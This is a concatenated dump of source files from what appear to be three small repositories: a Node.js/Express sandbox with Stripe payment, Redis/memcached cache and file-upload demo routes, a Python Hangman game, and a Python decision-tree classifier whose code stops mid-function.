LOADING_FIRST = '1st';
// Logs which script invoked this helper.
function loading_func_1st(caller) {
  console.log('loading_func_1st', caller);
}
console.log('loading/first.js', 'END');
<file_sep># node-js-web-sandbox
A sandbox project for trying out various Web technologies and libraries with Node.js and Express.
## Setup on your local
```
$ git clone <EMAIL>:tayutaedomo/node-js-web-sandbox.git
$ cd node-js-web-sandbox
$ npm install
$ npm start
$ open 'http://localhost:3000'
```
## Setup for Redis
Set the Redis configuration if you use Redis.
```
$ export REDIS_URL=redis://user:password@redis-service.com:6379/
```
## Setup for memcached
Set the memcached configuration if you use memcached.
```
$ export MEMCACHE_SERVERS=[user:pass@]server1[:11211],[user:pass@]server2[:11211]
```
<file_sep>var debug = require('debug')('node-js-web-sandbox:routes:stripe');
var express = require('express');
var router = express.Router();
var stripe = require('stripe')(process.env.STRIPE_SECRET_KEY);
// GET /checkout — show the Stripe Checkout demo form.
router.get('/checkout', function(req, res) {
  var locals = {
    title: 'Stripe Checkout',
    data: { params: {} }
  };
  res.render('stripe/checkout', locals);
});
// POST /checkout — create a Stripe customer from the tokenized card details,
// immediately charge that customer 1000 cents (USD), and render both API
// results as pretty-printed JSON.
router.post('/checkout', function(req, res) {
  var params = {
    email: req.body.email,
    token: req.body.stripeToken
  };
  var payload = {
    title : 'Stripe Checkout',
    data: {
      params: params,
      result_list: []
    }
  };
  debug(params);
  // See: https://stripe.com/docs/quickstart#saving-card-information
  stripe.customers.create({
    email: params.email,
    source: params.token
  }).then(function(customer) {
    // YOUR CODE: Save the customer ID and other info in a database for later.
    debug(customer);
    payload.data.result_list.push(customer);
    return stripe.charges.create({
      amount: 1000,
      currency: "usd",
      customer: customer.id
    });
  }).then(function(charge) {
    // Use and save the charge info.
    debug(charge);
    payload.data.result_list.push(charge);
    payload.data.result = JSON.stringify(payload.data.result_list, null, 2);
    res.render('stripe/checkout', payload);
  }).catch(function(err) {
    // Any Stripe failure (customer or charge step) lands here.
    console.error(err.stack);
    payload.data.error = err;
    res.render('stripe/checkout', payload);
  });
});
// GET /stripe/checkout_price — render the "Checkout without Price" demo form.
router.get('/checkout_price', (req, res) => {
  const locals = { title : 'Stripe Checkout without Price', data: { params: {} } };
  res.render('stripe/checkout_price', locals);
});
// POST /stripe/checkout_price — like /checkout but optionally skips the
// charge step (form field no_charge == "1"), creating only the Customer.
router.post('/checkout_price', function(req, res) {
  var payload = {
    title : 'Stripe Checkout without Price',
    data: {
      params: {},
      result_list: []
    }
  };
  payload.data.params.email = req.body.email;
  payload.data.params.token = req.body.stripeToken;
  debug(payload.data.params);
  stripe.customers.create({
    email: payload.data.params.email,
    source: payload.data.params.token
  }).then(function(customer) {
    // YOUR CODE: Save the customer ID and other info in a database for later.
    debug(customer);
    payload.data.result_list.push(customer);
    // Loose == is deliberate: the form posts no_charge as the string "1".
    if (req.body.no_charge == 1) return {};
    return stripe.charges.create({
      amount: 2000,
      currency: "usd",
      customer: customer.id
    });
  }).then(function(charge) {
    // Use and save the charge info (an empty object when skipped above).
    debug(charge);
    payload.data.result_list.push(charge);
    payload.data.result = JSON.stringify(payload.data.result_list, null, 2);
    res.render('stripe/checkout_price', payload);
  }).catch(function(err) {
    console.error(err.stack);
    payload.data.error = err;
    res.render('stripe/checkout_price', payload);
  });
});
// GET /stripe/charge — render the charge-an-existing-customer form.
router.get('/charge', (req, res) => {
  const locals = { title : 'Stripe Charge', data: { params: {} } };
  res.render('stripe/charge', locals);
});
// POST /stripe/charge — charge an existing Customer (by id) $10.00
// and render the raw Charge object.
router.post('/charge', function(req, res) {
  var payload = {
    title : 'Stripe Charge',
    data: { params: {} }
  };
  stripe.charges.create({
    amount: 1000,
    currency: "usd",
    // amount: 1000,
    // currency: "jpy",
    customer: req.body.customer_id
  }).then(function(charge) {
    debug(charge);
    payload.data.result = JSON.stringify(charge, null, 2);
    res.render('stripe/charge', payload);
  }).catch(function(err) {
    console.error(err.stack);
    payload.data.error = err;
    res.render('stripe/charge', payload);
  });
});
// GET /stripe/subscription — render the subscription demo form.
router.get('/subscription', (req, res) => {
  const locals = { title : 'Stripe Subscription', data: { params: {} } };
  res.render('stripe/subscription', locals);
});
// POST /stripe/subscription — subscribe an existing customer to the
// 'usd_monthly' plan and render the raw subscription object.
router.post('/subscription', function(req, res) {
  var payload = {
    title : 'Stripe Subscription',
    data: { params: {} }
  };
  stripe.subscriptions.create({
    customer: req.body.customer_id,
    items: [
      {
        plan: 'usd_monthly'
      }
    ]
  }).then(function(subscription) {
    debug(subscription);
    payload.data.result = JSON.stringify(subscription, null, 2);
    // Bug fix: the success path previously rendered 'stripe/charge'
    // (the charge demo's view); render the subscription view so the
    // page matches this route and the error path below.
    res.render('stripe/subscription', payload);
  }).catch(function(err) {
    console.error(err.stack);
    payload.data.error = err;
    res.render('stripe/subscription', payload);
  });
});
// GET /stripe/elements — render the Stripe Elements demo form.
router.get('/elements', (req, res) => {
  const locals = { title : 'Stripe Elements', data: { params: {} } };
  res.render('stripe/elements', locals);
});
// POST /stripe/elements — echo the submitted form fields back into the view.
router.post('/elements', (req, res) => {
  const payload = {
    title : 'Stripe Elements',
    data: {
      params: req.body,
      result_list: [],
      result: JSON.stringify(req.body, null, 2)
    }
  };
  res.render('stripe/elements', payload);
});
// Client-only Checkout (v3): the view talks to Stripe with a publishable
// key; success/cancel simply re-render the same page with a new title.
router.get('/v3_checkout_client', function(req, res) {
  res.render('stripe/v3_checkout_client', {
    title : 'Stripe v3 Checkout Client',
    data: { req: req, res: res }
  });
});
router.get('/v3_checkout_client/success', function(req, res) {
  res.render('stripe/v3_checkout_client', {
    title : 'Stripe v3 Checkout Client Success',
    data: { req: req, res: res }
  });
});
router.get('/v3_checkout_client/cancel', function(req, res) {
  res.render('stripe/v3_checkout_client', {
    title : 'Stripe v3 Checkout Client Cancel',
    data: { req: req, res: res }
  });
});
// Server-created Checkout Session (v3): build absolute success/cancel URLs,
// create the session, then hand it to the view for redirectToCheckout.
router.get('/v3_checkout_server', (req, res) => {
  let base_url = `${req.protocol}://`;
  // req.hostname drops the port, so the local dev port 3002 is hard-coded.
  base_url += req.hostname == 'localhost' ? 'localhost:3002' : req.hostname;
  const success_url = `${base_url}/stripe/v3_checkout_server/success`;
  const cancel_url = `${base_url}/stripe/v3_checkout_server/cancel`;
  const payload = {
    title : 'Stripe v3 Checkout Server',
    data: { req: req, res: res }
  };
  stripe.checkout.sessions.create({
    payment_method_types: ['card'],
    line_items: [{
      name: 'T-shirt',
      description: 'Comfortable cotton t-shirt',
      images: ['https://tayutaedomo-web.herokuapp.com/images/shutterstock_125750330.jpg'],
      amount: 1000,
      currency: 'usd',
      quantity: 1,
    }],
    success_url: success_url,
    cancel_url: cancel_url,
  }, (err, session) => {
    // Render either the session (success) or the error in the same view.
    if (err) {
      console.error(err.stack || err);
      payload.data.error = err;
    } else {
      payload.data.session = session;
    }
    debug('v3_checkout_server payload', payload);
    res.render('stripe/v3_checkout_server', payload);
  });
});
router.get('/v3_checkout_server/success', (req, res) => {
  res.render('stripe/v3_checkout_server', {
    title : 'Stripe v3 Checkout Server Success',
    data: { req: req, res: res }
  });
});
router.get('/v3_checkout_server/cancel', (req, res) => {
  res.render('stripe/v3_checkout_server', {
    title : 'Stripe v3 Checkout Server Cancel',
    data: { req: req, res: res }
  });
});
module.exports = router;
<file_sep>/*
* Reference: https://circleci.com/ja/blog/custom-docker-02/
*/
const express = require('express');
const router = express.Router();
const graphqlHTTP = require('express-graphql');
const schema = require('./schema');
const resolvers = require('./resolvers');
// Mount express-graphql at this router's root with GraphiQL enabled,
// using the schema and resolver map defined alongside this file.
router.use(
  '/',
  graphqlHTTP({
    schema,
    rootValue: resolvers,
    graphiql: true
  })
);
module.exports = router;
<file_sep>const express = require('express');
const router = express.Router();
const os = require('os');
const multer = require('multer');
const upload_local = multer({ dest: os.tmpdir() });
const upload_memoney = multer({}); // No file output, file.buffer only
const util = require('util')
const multiparty = require('multiparty');
// POST /file_upload/multer_local — multer writes the upload to the OS temp
// dir; req.files holds the file metadata, req.body the other form fields.
router.post('/multer_local', upload_local.fields([ { name: 'file' } ]), function(req, res) {
  console.log('files', req.files);
  console.log('files.file[0]', req.files.file[0]);
  console.log('body', req.body);
  const payload = {
    title : 'Local Store | Multer',
    data: {}
  };
  res.render('file_upload/multer_local', payload);
});
// POST /file_upload/multer_memory — multer keeps the upload in memory only
// (file.buffer); NOTE: `upload_memoney` is a long-standing typo for "memory".
router.post('/multer_memory', upload_memoney.fields([ { name: 'file' } ]), function(req, res) {
  console.log('files', req.files);
  console.log('body', req.body);
  const payload = {
    title : 'On Memory | Multer',
    data: {}
  };
  res.render('file_upload/multer_memory', payload);
});
// POST /file_upload/multer_xhr — XHR variant: respond with an inspected
// dump of what multer parsed instead of rendering a view.
router.post('/multer_xhr', upload_local.fields([ { name: 'file' } ]), function(req, res) {
  console.log('files', req.files);
  console.log('body', req.body);
  const payload = {
    files: req.files,
    body: req.body
  };
  res.send(util.inspect(payload, { depth: 10 }));
});
// POST /file_upload/multiparty — parse the multipart body with multiparty
// instead of multer; fields/files arrive via callback.
router.post('/multiparty', function(req, res) {
  const payload = {
    title : 'multiparty',
    data: {}
  };
  const form = new multiparty.Form();
  form.parse(req, function(err, fields, files) {
    // Best-effort: log the parse error but still render the page.
    if (err) console.error(err.stack || err);
    console.log('body', req.body);
    console.log('fields', fields);
    console.log('files', util.inspect(files, { colors: true, depth: 10 }));
    res.render('file_upload/multiparty', payload);
  });
});
// GET /file_upload/<view> — generic renderer for the demo pages.
router.get('/:view', function(req, res, next) {
  res.render('file_upload/' + req.params.view, { title: req.params.view + ' | File Upload', data: {} });
});
module.exports = router;
<file_sep>var express = require('express');
var router = express.Router();
//var beautify = require('js-beautify').js_beautify;
var redis_url = process.env.REDIS_URL;
// router.get('/:view', function(req, res, next) {
// res.render('cache/' + req.params.view, { title: req.params.view + ' | Cache Middleware' });
// });
// GET /cache/redis/get — render the lookup form.
router.get('/redis/get', function(req, res) {
  res.render('cache/redis/get', {
    title : 'Redis Get',
    data: { params: {} }
  });
});
// POST /cache/redis/get — fetch a key with node_redis and render the value.
router.post('/redis/get', function(req, res) {
  var key = req.body.key;
  var params = { key: key };
  var redis = require('redis');
  var client = redis.createClient(redis_url);
  // TODO: How to integrate connect error handling
  client.on('error', function (err) {
    console.error(err);
  });
  var payload = {
    title : 'Redis Get',
    data: {
      params: params
    }
  };
  client.get(key, function(err, value) {
    if (err) {
      //beautify(JSON.stringify(err), { indent_size: 2 })
      payload.data.error = JSON.stringify(err, null, 2);
    } else {
      if (value == null) {
        // Distinguish "key missing" from an empty-string value.
        payload.data.result = 'Value is null.';
      } else {
        payload.data.result = value;
      }
    }
    res.render('cache/redis/get', payload);
  });
});
// GET /cache/ioredis/get — render the lookup form.
router.get('/ioredis/get', function(req, res) {
  res.render('cache/ioredis/get', {
    title : 'ioredis Get',
    data: { params: {} }
  });
});
// POST /cache/ioredis/get — fetch a key with ioredis and render the value.
router.post('/ioredis/get', function(req, res) {
  var key = req.body.key;
  var params = { key: key };
  var Redis = require('ioredis');
  var redis = new Redis(redis_url);
  var payload = {
    title : 'Redis Get',
    data: {
      params: params
    }
  };
  redis.get(key, function (err, result) {
    if (err) {
      payload.data.error = JSON.stringify(err, null, 2);
    } else {
      if (result == null) {
        payload.data.result = 'Value is null.';
      } else {
        payload.data.result = result;
      }
    }
    res.render('cache/ioredis/get', payload);
  });
});
// GET /cache/ioredis/set — render the set form.
router.get('/ioredis/set', function(req, res) {
  res.render('cache/ioredis/set', {
    title : 'ioredis Set',
    data: { params: {} }
  });
});
// POST /cache/ioredis/set — store key/value with ioredis, then render the
// outcome ("OK" or the serialized error).
router.post('/ioredis/set', function(req, res) {
  var key = req.body.key;
  var value = req.body.value;
  var params = { key: key };
  var Redis = require('ioredis');
  var redis = new Redis(redis_url);
  var payload = {
    title : 'Redis Set',
    data: {
      params: params
    }
  };
  redis.set(key, value, function(err, result) {
    if (err) {
      payload.data.error = JSON.stringify(err, null, 2);
    } else {
      payload.data.result = result;
    }
    // Bug fix: this handler previously rendered the *get* view
    // ('cache/ioredis/get'); render the set view so the response matches
    // this route (the memjs set handler already does this).
    res.render('cache/ioredis/set', payload);
  });
});
// GET /cache/node-memcached-client/get — render the lookup form.
router.get('/node-memcached-client/get', function(req, res) {
  res.render('cache/node-memcached-client/get', {
    title : 'node-memcached-client Get',
    data: { params: {} }
  });
});
// POST /cache/node-memcached-client/get — fetch a key from a local
// memcached (hard-coded localhost:11211).  NOTE(review): the connection
// is never closed after the lookup.
router.post('/node-memcached-client/get', function(req, res) {
  var key = req.body.key;
  var params = { key: key };
  var Memcached = require('node-memcached-client');
  var client = new Memcached({
    host: 'localhost',
    port: 11211
  });
  var payload = {
    title : 'node-memcached-client Get',
    data: {
      params: params
    }
  };
  client.connect().then(function(c) {
    return c.get(key);
  }).then(function(value) {
    if (value == null) {
      payload.data.result = 'Value is null.';
    } else {
      payload.data.result = value;
    }
    res.render('cache/node-memcached-client/get', payload);
  }).catch(function(err) {
    payload.data.error = JSON.stringify(err, null, 2);
    res.render('cache/node-memcached-client/get', payload);
  });
});
// GET /cache/memjs/get — render the lookup form.
router.get('/memjs/get', function(req, res) {
  res.render('cache/memjs/get', {
    title : 'memjs Get',
    data: { params: {} }
  });
});
// POST /cache/memjs/get — fetch a key via memjs (configured through the
// MEMCACHE_SERVERS environment variable).
router.post('/memjs/get', function(req, res) {
  var key = req.body.key;
  var params = { key: key };
  var memjs = require('memjs');
  var client = memjs.Client.create();
  var payload = {
    title : 'memjs Get',
    data: {
      params: params
    }
  };
  client.get(key, function(err, value) {
    if (err) {
      payload.data.error = JSON.stringify(err, null, 2);
    } else {
      if (value == null) {
        payload.data.result = 'Value is null.';
      } else {
        payload.data.result = value;
      }
    }
    res.render('cache/memjs/get', payload);
  });
});
// GET /cache/memjs/set — render the set form.
router.get('/memjs/set', function(req, res) {
  res.render('cache/memjs/set', {
    title : 'memjs Set',
    data: { params: {} }
  });
});
// POST /cache/memjs/set — store key/value with a 600-second TTL.
router.post('/memjs/set', function(req, res) {
  var key = req.body.key;
  var value = req.body.value;
  var params = { key: key };
  var memjs = require('memjs');
  var client = memjs.Client.create();
  var payload = {
    title : 'memjs Set',
    data: {
      params: params
    }
  };
  client.set(key, value, { expires: 600 }, function(err, result) {
    if (err) {
      payload.data.error = JSON.stringify(err, null, 2);
    } else {
      payload.data.result = result;
    }
    res.render('cache/memjs/set', payload);
  });
});
module.exports = router;
<file_sep>var express = require('express');
var router = express.Router();
/* GET home page. */
// Logs the various client-IP sources (proxy headers vs. socket) for
// debugging behind hosting proxies, then renders the landing page.
router.get('/', function(req, res, next) {
  console.log('req.headers["x-forwarded-for"]', req.headers['x-forwarded-for']);
  console.log('req.connection.remoteAddress', req.connection.remoteAddress);
  console.log('req.headers["x-appengine-user-ip"]', req.headers['x-appengine-user-ip']);
  console.log('req.ip', req.ip);
  console.log('req.ips', req.ips);
  res.render('index', { title: 'Web Sandbox' });
});
// Human-readable page titles for the video.js demo views; any view not
// listed falls back to its own name below.
var VIDEOJS_TITLES = {
  quick_start: 'Quick Start',
  quick_start_without_auto: 'Quick Start without auto setup',
  guide_setup: 'Guide: Setup',
  guide_setup_centered: 'Guide: Setup with play button centered',
  guide_setup_dynamically: 'Guide: Setup with dynamically loaded',
  contrib_hls: 'videojs-contrib-hls',
  design_resizing: 'Design: Resizing',
  events: 'Events'
};
router.get('/videojs/:view', function(req, res) {
  var title = VIDEOJS_TITLES[req.params.view] ? VIDEOJS_TITLES[req.params.view] : req.params.view;
  res.render('videojs/' + req.params.view, { title : title });
});
// Generic per-topic renderers: GET /<topic>/<view> renders
// views/<topic>/<view>.ejs with "<view> | <Topic>" as the page title.
router.get('/agilecrm/api', function(req, res, next) {
  res.render('agilecrm/api', { title: 'Agile CRM API' });
});
router.get('/dom/:view', function(req, res, next) {
  res.render('dom/' + req.params.view, { title: req.params.view + ' | DOM' });
});
router.get('/css/:view', function(req, res, next) {
  res.render('css/' + req.params.view, { title: req.params.view + ' | CSS' });
});
router.get('/js/:view', function(req, res, next) {
  res.render('js/' + req.params.view, { title: req.params.view + ' | Javascript' });
});
router.get('/webrtc/:view', function(req, res, next) {
  res.render('webrtc/' + req.params.view, { title: req.params.view + ' | Media API' });
});
router.get('/canvas/:view', function(req, res, next) {
  res.render('canvas/' + req.params.view, { title: req.params.view + ' | Canvas' });
});
router.get('/timeline/:view', function(req, res, next) {
  res.render('timeline/' + req.params.view, { title: req.params.view + ' | Timeline' });
});
router.get('/ios/:view', function(req, res, next) {
  res.render('ios/' + req.params.view, { title: req.params.view + ' | iOS Web' });
});
router.get('/hlsjs/:view', function(req, res, next) {
  res.render('hlsjs/' + req.params.view, { title: req.params.view + ' | hls.js' });
});
router.get('/qrcode/:view', function(req, res, next) {
  res.render('qrcode/' + req.params.view, { title: req.params.view + ' | QR Code' });
});
router.get('/scheme/:view', function(req, res, next) {
  res.render('scheme/' + req.params.view, { title: req.params.view + ' | URL Scheme' });
});
router.get('/html_video/:view', function(req, res, next) {
  res.render('html_video/' + req.params.view, { title: req.params.view + ' | HTMLVideoElement' });
});
// GET /manifest.json — minimal Web App Manifest served dynamically
// (larger icon sizes are stubbed out below).
router.get('/manifest.json', function(req, res) {
  res.send(
  {
    "short_name": "TayuWebSdx",
    "name": "Tayutaedomo Web Sandbox",
    "icons": [
      {
        "src": "/images/icon/app_48x48.png",
        "type": "image/png",
        "sizes": "48x48"
      }
      // {
      //   "src": "launcher-icon-2x.png",
      //   "type": "image/png",
      //   "sizes": "96x96"
      // },
      // {
      //   "src": "launcher-icon-4x.png",
      //   "type": "image/png",
      //   "sizes": "192x192"
      // }
    ],
    "start_url": "/?manifest=1",
    "display": "browser"
    //"display": "standalone"
    //"orientation": "landscape"
  });
});
module.exports = router;
<file_sep>//require('sqreen');
const express = require('express');
const engine = require('ejs-mate');
const path = require('path');
const favicon = require('serve-favicon');
const logger = require('morgan');
const cookieParser = require('cookie-parser');
const bodyParser = require('body-parser');
const beautify = require('js-beautify').js_beautify;
const routes = require('./routes/index');
const cache_routes = require('./routes/cache');
const stripe_routes = require('./routes/stripe');
const file_upload_routes = require('./routes/file_upload');
const mediainfo_routes = require('./routes/mediainfo');
const pdf_routes = require('./routes/pdf');
const jimp_routes = require('./routes/jimp');
const crypto_routes = require('./routes/crypto');
const graphql_routes = require('./routes/graphql');
const app = express();
// view engine setup
app.engine('ejs', engine);
app.set('views', path.join(__dirname, 'views'));
app.set('view engine', 'ejs');
// uncomment after placing your favicon in /public
app.use(favicon(path.join(__dirname, 'public', 'favicon.ico')));
app.use(logger('dev'));
app.use(bodyParser.json());
app.use(bodyParser.urlencoded({ extended: false }));
app.use(cookieParser());
app.use(express.static(path.join(__dirname, 'public')));
// locals
// beautify is exposed to every EJS template for pretty-printing JSON.
app.locals.beautify = beautify;
// Feature routers are mounted before the catch-all index routes.
app.use('/cache', cache_routes);
app.use('/stripe', stripe_routes);
app.use('/file_upload', file_upload_routes);
app.use('/mediainfo', mediainfo_routes);
app.use('/pdf', pdf_routes);
app.use('/jimp', jimp_routes);
app.use('/crypto', crypto_routes);
app.use('/graphql', graphql_routes);
app.use('/', routes);
// catch 404 and forward to error handler
app.use(function(req, res, next) {
  const err = new Error('Not Found');
  err.status = 404;
  next(err);
});
// error handlers
// development error handler
// will print stacktrace
if (app.get('env') === 'development') {
  app.use(function(err, req, res, next) {
    res.status(err.status || 500);
    res.render('error', {
      message: err.message,
      error: err
    });
  });
}
// production error handler
// no stacktraces leaked to user
app.use(function(err, req, res, next) {
  res.status(err.status || 500);
  res.render('error', {
    message: err.message,
    error: {}
  });
});
module.exports = app;
| a7e503ad0dc4b8481640aeba0b297fbe5bd0a969 | [
"JavaScript",
"Markdown"
] | 13 | JavaScript | tayutaedomo/videojs-trial | 1f20043165ca47c8fd733bba087c19a3297710fb | a1d480db5557949cf1e36c77c40dcd2b6075fecd |
refs/heads/master | <repo_name>HayWiir/Hangman<file_sep>/README.md
# Hangman
A variant of the hangman word game.
The user has to guess a word that is passed as a string through a function.
A part of the MIT 6.00.1x course on edX.
Later forked as a Java version, which adds starting from a random word and multiplayer support.
<file_sep>/src/hangman.py
def isWordGuessed(secretWord, lettersGuessed):
    '''
    secretWord: string, the word the user is guessing
    lettersGuessed: list, the letters guessed so far
    returns: True if every letter of secretWord appears in
      lettersGuessed, False otherwise.
    '''
    # all() short-circuits on the first missing letter instead of
    # counting matching positions one by one.
    return all(letter in lettersGuessed for letter in secretWord)
def getGuessedWord(secretWord, lettersGuessed):
    '''
    Render the partially guessed word: each revealed letter (or an
    underscore for a letter not yet guessed) followed by a space.
    '''
    pieces = []
    for letter in secretWord:
        pieces.append(letter + ' ' if letter in lettersGuessed else '_ ')
    return ''.join(pieces)
def getAvailableLetters(lettersGuessed):
    '''
    lettersGuessed: list of letters guessed so far
    returns: string of lowercase letters not yet guessed, in
      alphabetical order.
    '''
    import string
    # Filtering (rather than list.remove) tolerates duplicate or
    # non-alphabetic entries in lettersGuessed, which previously
    # raised ValueError.
    return ''.join(c for c in string.ascii_lowercase if c not in lettersGuessed)
def hangman(secretWord):
    '''
    secretWord: string, the secret word to guess.
    Starts up an interactive game of Hangman.
    * At the start of the game, let the user know how many
    letters the secretWord contains.
    * Ask the user to supply one guess (i.e. letter) per round.
    * The user should receive feedback immediately after each guess
    about whether their guess appears in the computers word.
    * After each round, you should also display to the user the
    partially guessed word so far, as well as letters that the
    user has not yet guessed.
    Follows the other limitations detailed in the problem write-up.
    '''
    # NOTE: Python 2 code (print statements, raw_input).
    print 'Welcome to the game, Hangman!'
    print 'I am thinking of a word that is ' + str(len(secretWord)) + ' letters long.'
    print '-----------'
    lettersGuessed = []
    nguess = 8  # wrong guesses allowed
    while nguess>0:
        print 'You have ' +str(nguess)+' guesses left.'
        print 'Available letters: ' + getAvailableLetters(lettersGuessed)
        guess = raw_input('Please guess a letter: ')
        guess = guess.lower()
        # isWordGuessed(guess, lettersGuessed): every char of the
        # single-letter guess already guessed => a repeated guess.
        if isWordGuessed(guess, lettersGuessed) == True:
            print "Oops! You've already guessed that letter: " + getGuessedWord(secretWord, lettersGuessed)
            print '-----------'
        # ... and against list(secretWord) it tests membership in the word.
        elif isWordGuessed(guess, list(secretWord)) == True:
            lettersGuessed.append(guess)
            print 'Good guess: '+ getGuessedWord(secretWord, lettersGuessed)
            print '-----------'
            if isWordGuessed(secretWord, lettersGuessed) == True:
                break
        else:
            # Wrong guess: record it and burn one attempt.
            lettersGuessed.append(guess)
            nguess -= 1
            print "Oops! That letter is not in my word: " + getGuessedWord(secretWord, lettersGuessed)
            print '-----------'
    if isWordGuessed(secretWord, lettersGuessed) == True:
        print 'Congratulations, you won!'
    elif nguess == 0:
        print "Sorry, you ran out of guesses. The word was " + secretWord +'.'
| 0e7f41fdf62f0551b5d6ad5791575378755f4a7d | [
"Markdown",
"Python"
] | 2 | Markdown | HayWiir/Hangman | 2faef54a1c7eba5af1975a7218452fa5be2fc3f9 | eb953df5a3edba3a4462c4a574f879d5b684d3fb |
refs/heads/master | <file_sep># -*- coding: utf-8 -*-
"""
Created on Mon Apr 1 18:08:39 2019
Decision Tree Algorithm
@author: <NAME>
"""
import sys
from random import randint
from tree import Node
from tree import LeafNode
from tree import Instance
# Fields
categories = []           # the two class labels from the training header
attributes = []           # boolean attribute names from the training header
trainingInstances = []    # Instance objects parsed from the training file
testInstances = []        # Instance objects parsed from the test file
# NOTE(review): `global` at module level is a no-op; baseline and
# baselineProbability are simply assigned later by computeBaseline().
global baseline
global baselineProbability
def readFiles(trainingFileName, testFileName):
    """Parse the training and test files into the module-level globals.

    The training file's first line lists the class labels, the second
    line the attribute names; every remaining line is one instance.
    The test file has the same layout but its two header lines are
    skipped.
    """
    with open(trainingFileName) as trainingFile:
        # get categories
        line = trainingFile.readline()
        for word in line.split():
            categories.append(word)
        # get attributes
        line = trainingFile.readline()
        for word in line.split():
            attributes.append(word)
        loadInstances(trainingFile, trainingInstances)
    with open(testFileName) as testFile:
        # skip headers
        testFile.readline()
        testFile.readline()
        loadInstances(testFile, testInstances)
def loadInstances(file, instancesList):
    """Append one Instance per non-trivial line of `file` to instancesList.

    Lines of length <= 1 (blank lines / bare newlines) are skipped.
    """
    for line in file.readlines():
        if len(line) > 1:
            instancesList.append(Instance(line.split()))
def buildTree(instances, currentAttributes):
    """Recursively build a decision tree over boolean attributes.

    Returns a Node (internal split on the purest attribute) or a
    LeafNode.  Empty instance lists fall back to the global baseline
    class; ties with no attributes left are broken at random.
    """
    # if instances list is empty
    if not instances:
        return LeafNode(baseline, baselineProbability)
    # if instances are pure, return a leaf node
    trueList = []
    falseList = []
    for instance in instances:
        classifyCategory(instance, trueList, falseList)
    if not (trueList and falseList):
        # Pure node: `instance` is the loop variable leaking out of the
        # for-loop above, so any instance's label represents the set.
        return LeafNode(instance.attributeList[0], 1)
    # if attributes are empty, return a leaf node with the majority class
    if not currentAttributes:
        if len(trueList) > len(falseList):
            return LeafNode(categories[0], (len(trueList)/len(instances)))
        elif len(trueList) < len(falseList):
            return LeafNode(categories[1], (len(falseList)/len(instances)))
        else:
            # Exact tie: pick a class at random.
            randomInt = randint(0,1)
            if (randomInt == 0):
                return LeafNode(categories[0], (len(trueList)/len(instances)))
            else:
                return LeafNode(categories[1], (len(falseList)/len(instances)))
    trueList = []
    falseList = []
    bestImpurity = 1.1
    bestAttributeIndex = 0
    # Find the purest attribute (lowest weighted impurity).
    # i + 1 because instance.attributeList includes the class at index 0.
    for i, attribute in enumerate(currentAttributes):
        tempTrueList = []
        tempFalseList = []
        index = attributes.index(attribute)
        for instance in instances:
            # add the instance to true or false for the attribute
            if not isinstance(instance, Instance):
                raise TypeError
            if instance.attributeList[index+1] == "true":
                tempTrueList.append(instance)
            elif instance.attributeList[index+1] == "false":
                tempFalseList.append(instance)
            else:
                raise ValueError
        impurity = computeImpurity(tempTrueList, tempFalseList)
        # <= keeps the *last* attribute among equally pure candidates.
        if (impurity <= bestImpurity):
            bestImpurity = impurity
            trueList = tempTrueList
            falseList = tempFalseList
            bestAttributeIndex = i
    # Build subtrees on the remaining (unused) attributes.
    unusedAttributes = currentAttributes[0:bestAttributeIndex] + currentAttributes[bestAttributeIndex+1:len(currentAttributes)]
    left = buildTree(trueList, unusedAttributes)
    right = buildTree(falseList, unusedAttributes)
    return Node(currentAttributes[bestAttributeIndex], left, right)
def classifyCategory(instance, trueList, falseList):
    """Append `instance` to trueList/falseList according to its class label."""
    if not isinstance(instance, Instance):
        raise TypeError
    if instance.attributeList[0] == categories[0]:
        trueList.append(instance)
    elif instance.attributeList[0] == categories[1]:
        falseList.append(instance)
    else:
        raise ValueError

def computeImpurity(trueList, falseList):
    """Weighted average impurity of a two-way split.

    NOTE: raises ZeroDivisionError if both lists are empty; callers
    always pass a partition of a non-empty instance list.
    """
    numOfInstances = len(trueList) + len(falseList)
    impurityTrue = calculateImpurity(trueList) * (len(trueList) / numOfInstances)
    impurityFalse = calculateImpurity(falseList) * (len(falseList) / numOfInstances)
    return impurityTrue + impurityFalse

# calculate impurity of given instances
def calculateImpurity(branchInstances):
    """P(class0) * P(class1) for the branch; 0 for an empty branch."""
    outcome1 = 0
    outcome2 = 0
    for instance in branchInstances:
        if instance.attributeList[0] == categories[0]:
            outcome1 += 1
        elif instance.attributeList[0] == categories[1]:
            outcome2 += 1
        else:
            raise ValueError
    if len(branchInstances) == 0:
        return 0
    return ((outcome1/len(branchInstances)) * (outcome2/len(branchInstances)))
def classifyTestInstances(rootNode):
    """Run every test instance through the tree and print DT accuracy (%)."""
    correct = []
    incorrect = []
    for i, instance in enumerate(testInstances):
        classification = classify(instance, i, rootNode)
        if (classification == instance.attributeList[0]):
            correct.append(instance)
        else:
            incorrect.append(instance)
    print("DT Accuracy = " + str(len(correct)/len(testInstances)*100))

def classify(instance, instanceIndex, node):
    """Walk the tree for one test instance; return the leaf's class label."""
    if isinstance(node, Node):
        attIndex = attributes.index(node.getAttribute)
        # +1 skips the class label stored at attributeList[0].
        attributeForTest = testInstances[instanceIndex].attributeList[attIndex+1]
        if attributeForTest == "true":
            return classify(instance, instanceIndex, node._left)
        elif attributeForTest == "false":
            return classify(instance, instanceIndex, node._right)
        else:
            print(attributeForTest)
            raise ValueError
    elif isinstance(node, LeafNode):
        return node._classification
    else:
        raise TypeError
def computeBaseline():
    """Set the module-level baseline to the majority training class."""
    yes = []
    no = []
    classifyTraining(yes, no)
    global baseline
    global baselineProbability
    # Set baseline to most popular classification
    if len(no) < 1 and len(yes) < 1:
        raise ValueError
    if len(yes) > len(no):
        baseline = yes[0].attributeList[0]
        baselineProbability = len(yes)/len(trainingInstances)
    elif len(yes) <= len(no):
        # Ties go to the second category.
        baseline = no[0].attributeList[0]
        baselineProbability = len(no)/len(trainingInstances)
    else:
        raise ValueError

def classifyTraining(yesList, noList):
    """Partition the training instances by class label into the two lists."""
    for instance in trainingInstances:
        if instance.attributeList[0] == categories[0]:
            yesList.append(instance)
        elif instance.attributeList[0] == categories[1]:
            noList.append(instance)
        else:
            raise ValueError

def classifyUsingBaseline():
    """Print the accuracy (%) of always predicting the baseline class."""
    correct = []
    for i, instance in enumerate(testInstances):
        if testInstances[i].attributeList[0] == baseline:
            correct.append(instance)
    print("Baseline Accuracy = " + str(len(correct)/len(testInstances)*100))
#def classifyTestInstances(rootNode):
def main():
    """Entry point: load data, build/report the tree, evaluate both models.

    Expects the training and test file paths as argv[1] and argv[2].
    """
    readFiles(sys.argv[1], sys.argv[2])
    # Debug output: the last parsed test instance.
    print(testInstances[len(testInstances)-1].attributeList)
    print()
    computeBaseline()
    # NOTE(review): debug print — a list always equals its shallow copy.
